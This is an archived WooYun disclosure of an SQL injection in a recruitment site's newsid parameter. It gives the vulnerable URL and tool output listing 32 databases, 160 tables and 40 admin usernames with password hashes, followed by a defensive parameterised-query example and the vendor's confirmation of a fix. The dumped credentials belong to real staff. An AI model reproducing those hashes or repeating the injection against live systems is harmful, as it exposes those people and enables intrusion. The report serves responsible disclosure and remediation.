
Vulnerability summary

Defect ID: wooyun-2014-057417

Title: 最佳东方 SQL injection, lots of databases and lots of tables

Affected vendor: 最佳东方

Author: 卡卡

Submitted: 2014-04-17 15:26

Fix time: 2014-06-01 15:26

Public disclosure: 2014-06-01 15:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-04-17: Details sent to the vendor, awaiting vendor handling
2014-04-17: Vendor confirmed; details visible to the vendor only
2014-04-27: Details disclosed to core white hats and domain experts
2014-05-07: Details disclosed to regular white hats
2014-05-17: Details disclosed to intern white hats
2014-06-01: Details disclosed to the public

Brief description:

最佳东方 really does pay attention to security, huh~~~

Detailed description:

Affected site:

corp.veryeast.cn


Vulnerable URL:

http://corp.veryeast.cn/question/getresult.asp?newsid=


The newsid parameter is not filtered.
A single quote throws a database error, an obvious injection point.



Couldn't be bothered doing it by hand, so I threw it into a tool and let it run.



Databases:

available databases [3
[*] 9first
[*] bangdating
[*] cp
[*] dfws_edm
[*] dfwsCMS
[*] dvbbs
[*] hotel_collect
[*] hrTool
[*] jdrc
[*] jdrc_20131019
[*] jdrc_table_backup
[*] jobbon
[*] lt
[*] master
[*] meadin
[*] meadinvote
[*] model
[*] msdb
[*] papers
[*] ReportServer
[*] ReportServerTempDB
[*] sendmail
[*] tempdb
[*] ve_crm
[*] vebbs
[*] veryeast
[*] veryeastcms
[*] wiki
[*] xlms
[*] xz_ihma_crm
[*] xzbbs
[*] XZHome


32 databases~~
Current database: veryeastcms
Tables:

Database: veryeastcms
[160 tables]
+--------------------------+
| FS_AD_Class |
| FS_AD_Info |
| FS_AD_Source |
| FS_AD_TxtInfo |
| FS_AP_City |
| FS_AP_Consume |
| FS_AP_Job |
| FS_AP_Job_Public |
| FS_AP_Payment |
| FS_AP_Province |
| FS_AP_Resume_BaseInfo |
| FS_AP_Resume_Certificate |
| FS_AP_Resume_EducateExp |
| FS_AP_Resume_Intention |
| FS_AP_Resume_Language |
| FS_AP_Resume_Mail |
| FS_AP_Resume_Other |
| FS_AP_Resume_Position |
| FS_AP_Resume_ProjectExp |
| FS_AP_Resume_TrainExp |
| FS_AP_Resume_WorkCity |
| FS_AP_Resume_WorkExp |
| FS_AP_SysPara |
| FS_AP_Trade |
| FS_AP_UserList |
| FS_DS_Address |
| FS_DS_Class |
| FS_DS_List |
| FS_DS_Special |
| FS_DS_Style |
| FS_DS_SysPara |
| FS_FL_Class |
| FS_FL_FrendList |
| FS_FL_SysPara |
| FS_HS_Picture |
| FS_HS_Quotation |
| FS_HS_Second |
| FS_HS_SysPara |
| FS_HS_Tenancy |
| FS_HS_UserList |
| FS_ME_Answer |
| FS_ME_AnswerForPoint |
| FS_ME_Answer_User |
| FS_ME_Award |
| FS_ME_Book |
| FS_ME_BuyBag |
| FS_ME_Card |
| FS_ME_CardPut |
| FS_ME_CertFile |
| FS_ME_CorpCard |
| FS_ME_CorpUser |
| FS_ME_Favorite |
| FS_ME_FavoriteClass |
| FS_ME_Friends |
| FS_ME_GetThing |
| FS_ME_Group |
| FS_ME_GroupDebate |
| FS_ME_GroupDebateClass |
| FS_ME_GroupDebateManage |
| FS_ME_Help |
| FS_ME_InfoClass |
| FS_ME_InfoContribution |
| FS_ME_InfoDown |
| FS_ME_InfoProduct |
| FS_ME_InfoiLogParam |
| FS_ME_InfoiLogTemplet |
| FS_ME_Infoilog |
| FS_ME_Log |
| FS_ME_Message |
| FS_ME_MyInfo |
| FS_ME_MySysPara |
| FS_ME_News |
| FS_ME_Order |
| FS_ME_Order_Detail |
| FS_ME_POP |
| FS_ME_Pay |
| FS_ME_Photo |
| FS_ME_PhotoClass |
| FS_ME_Prize |
| FS_ME_Report |
| FS_ME_Review |
| FS_ME_SysPara |
| FS_ME_User_Prize |
| FS_ME_Users |
| FS_ME_VocationClass |
| FS_ME_businesscard |
| FS_ME_businesscardClass |
| FS_ME_iLogClass |
| FS_ME_iLogSysParam |
| FS_MF_Admin |
| FS_MF_AdminGroup |
| FS_MF_Config |
| FS_MF_DefineData |
| FS_MF_DefineTable |
| FS_MF_DefineTableClass |
| FS_MF_Error_Log |
| FS_MF_FreeLabel |
| FS_MF_Labestyle |
| FS_MF_Lable |
| FS_MF_LableClass |
| FS_MF_Login_Log |
| FS_MF_Mod |
| FS_MF_Mod_Para |
| FS_MF_Oper_Log |
| FS_MF_POP |
| FS_MF_StyleClass |
| FS_MF_Sub_Sys |
| FS_MS_Company |
| FS_MS_ExpressCompany |
| FS_MS_PayMethod |
| FS_MS_Products |
| FS_MS_ProductsClass |
| FS_MS_Special |
| FS_MS_SysPara |
| FS_MS_WithDraw |
| FS_MS_WithDraw_Detail |
| FS_NS_FreeJsFile |
| FS_NS_Freejs |
| FS_NS_General |
| FS_NS_News |
| FS_NS_NewsClass |
| FS_NS_News_Unrgl |
| FS_NS_SpeciaList |
| FS_NS_Special |
| FS_NS_SysParam |
| FS_NS_Sysjs |
| FS_NS_TodayPic |
| FS_SD_Address |
| FS_SD_Class |
| FS_SD_Config |
| FS_SD_News |
| FS_SS_Stat |
| FS_SS_SysPara |
| FS_VE_QuestionResult |
| FS_VS_Class |
| FS_VS_Items |
| FS_VS_Items_Result |
| FS_VS_Steps |
| FS_VS_SysPara |
| FS_VS_Theme |
| FS_WS_BBS |
| FS_WS_Class |
| FS_WS_Config |
| FS_WS_NewsTell |
| VE_Survey_Class |
| VE_Survey_Item |
| VE_Survey_Result |
| VE_Survey_Topic |
| VE_Survey_User |
| VE_sendMail |
| xlaALSBusy |
| xlaALSCans |
| xlaALSCustomers |
| xlaALSDepts |
| xlaALSRequests |
| xlaALSUsers |
| xlaALSVisitors |
| xlaALSiDeptsCans |
| xlaALSiUsersCans |
| xlaALSiUsersDepts |
+--------------------------+


With this many tables, it's easy to see how much data there is.
Admin accounts:

Database: veryeastcms
Table: FS_MF_Admin
[40 entries]
+---------------+------------------+
| Admin_Name | Admin_Pass_Word |
+---------------+------------------+
| admin | ee8361d8773b19d0 |
| caibian | 961f721aba704dd7 |
| chengting | 49ba59abbe56e057 |
| chenjie | 2aa5efe8a2467438 |
| chenlingxiao | 0e72c85d36be5edc |
| chenxuejuan | 28edea3803d9aeab |
| daiyeqin | 44c258f9e94f9a1b |
| fengzenghua | 49ba59abbe56e057 |
| fuhuayan | 49ba59abbe56e057 |
| huangxian | 49ba59abbe56e057 |
| hudan | 49ba59abbe56e057 |
| huhailin | 4ac646c9e65a1769 |
| huxiaoling | 49ba59abbe56e057 |
| jinweiwei | 49ba59abbe56e057 |
| jiqinghuan | 4305282bdebcb792 |
| liling | 49ba59abbe56e057 |
| lishanshan | 11002a996f767f06 |
| liuxiuliang | 49ba59abbe56e057 |
| lixiangqin | f4671fe259c2c911 |
| liyang | 7c722d6ac7b3c8be |
| qiulanglang | 49ba59abbe56e057 |
| ruanshufang | 7b8dc4ec98d843c1 |
| shichangzhuli | 49ba59abbe56e057 |
| shishanshan | 49ba59abbe56e057 |
| sunhuaying | a3481141fc7f4454 |
| sunshaochen | 7db75a7ec1ab2755 |
| tongqingling | 49ba59abbe56e057 |
| wangxiaoyan | 7f7a01899b18e4fb |
| wupengfei | 49ba59abbe56e057 |
| wuyunyun | ae1450e4fa7252b0 |
| xiefang | 039a376d7ce793ee |
| xiefei | 49ba59abbe56e057 |
| yaozhuo | 49ba59abbe56e057 |
| zhanglin | 49ba59abbe56e057 |
| zhangming | 3c4040fafda4523d |
| zhangrui | 49ba59abbe56e057 |
| zhaoziying | 49ba59abbe56e057 |
| zhiban | 49ba59abbe56e057 |
| zhoulingjia | 119d5f6c8576bda1 |
| zhouyebo | 49ba59abbe56e057 |
+---------------+------------------+


This was only a check, so I stopped here and didn't go any further~~

Proof of vulnerability (same screenshots and tool output as in the detailed description above):



Fix recommendation:

Filter the input~

Copyright notice: reposting must credit the source, 卡卡@乌云
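The recommended fix is filtering. As an added example that is not from the report or from the vendor, the code below shows the defect described above (the request value concatenated into the SQL text, so a stray quote breaks the statement) beside its hardened form, using Python with sqlite3 as a stand-in for the site's classic ASP and SQL Server stack. The table name FS_VE_QuestionResult is taken from the dump above; its columns, the sample rows and every function name are assumptions made for this example.

```python
import re
import sqlite3

# Constructed stand-in for the site's database: the table name comes from
# the report's dump, but the columns and rows are assumptions for the demo.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE FS_VE_QuestionResult "
        "(id INTEGER PRIMARY KEY, NewsID INTEGER, Answer TEXT)"
    )
    conn.executemany(
        "INSERT INTO FS_VE_QuestionResult (NewsID, Answer) VALUES (?, ?)",
        [(101, "yes"), (101, "no"), (102, "maybe")],
    )
    return conn


def get_result_unsafe(conn: sqlite3.Connection, newsid: str) -> list:
    """The defect the report describes: the raw query-string value is
    concatenated into the SQL text, so whatever is in newsid becomes part
    of the statement; as on the page, a stray quote is a syntax error."""
    sql = (
        "SELECT Answer FROM FS_VE_QuestionResult WHERE NewsID = "
        + newsid
        + " ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql)]


# Allow-list for the identifier: a short run of ASCII digits, nothing else.
NEWSID_RE = re.compile(r"[0-9]{1,9}")


def validate_newsid(raw: str) -> int:
    """The 'filter' step: reject anything that is not a plain integer id
    before it gets anywhere near SQL."""
    if NEWSID_RE.fullmatch(raw) is None:
        raise ValueError("newsid must be a positive integer")
    return int(raw)


def get_result_safe(conn: sqlite3.Connection, newsid: str) -> list:
    """Hardened form: validate, then bind the value as a parameter so the
    driver treats it strictly as data, never as statement text."""
    nid = validate_newsid(newsid)
    rows = conn.execute(
        "SELECT Answer FROM FS_VE_QuestionResult WHERE NewsID = ? ORDER BY id",
        (nid,),
    )
    return [row[0] for row in rows]


def compare(newsid: str) -> dict:
    """Run one input through both versions and report what each does."""
    conn = make_db()
    result = {}
    try:
        result["unsafe"] = get_result_unsafe(conn, newsid)
    except sqlite3.OperationalError as exc:
        # The single-quote error the report observed on the live site.
        result["unsafe"] = "SQL error: " + str(exc)
    try:
        result["safe"] = get_result_safe(conn, newsid)
    except ValueError as exc:
        result["safe"] = "rejected: " + str(exc)
    return result


if __name__ == "__main__":
    for probe in ("101", "1'"):
        print(repr(probe), compare(probe))
```

Parameter binding alone is enough to close the injection; the allow-list check on newsid is the filtering the report asks for and also keeps malformed values out of the database logs. One further point from the dump above: the listing of 32 databases, including master and msdb, shows the application's database account can see every database on the server, so cutting that account's grants down to the one schema it needs limits what any other missed query could expose.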


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2014-04-17 15:30

Vendor reply:

Vulnerability confirmed, thanks @卡卡

Latest status:

2014-04-17: Vulnerability fixed